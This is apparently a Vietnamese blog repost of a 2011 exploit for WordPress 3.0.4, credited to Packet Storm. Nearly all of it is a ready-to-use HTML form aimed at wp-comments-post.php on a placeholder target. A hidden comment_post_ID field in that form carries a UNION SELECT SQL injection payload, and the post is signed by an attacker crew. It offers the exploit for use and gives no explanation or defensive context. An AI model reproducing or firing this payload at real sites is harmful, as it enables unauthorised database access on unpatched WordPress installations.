12 September 2011

[SQL Inject] WordPress 3.0.4 Blind SQL Injection


Bài viết liên quan:

<!--
< form action="http://[target]/[path]/wp-comments-post.php" method="post" id="commentform">
< input id="author" name="author" type="text" value="KedAns-Dz" size="30" aria-required='true'/>
< input id="url" name="url" type="text" value="http://1337day.com" size="30"/>
< textarea id="comment" name="comment" cols="45" rows="1" aria-required="true">
KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team
< /textarea>
< input name="submit" type="submit" id="submit" value="Post Comment"/>
< input type='hidden' name='comment_post_ID' value="-1337' UNION SELECT (0,@@VERSION)--" id='comment_post_ID'/>
-->
 
 
Source: http://dl.packetstormsecurity.net/1109-exploits/wp304-sql.txt 

0 comments:

Post a Comment

Để lại góp ý của bạn để blog của mình hoàn thiện hơn :))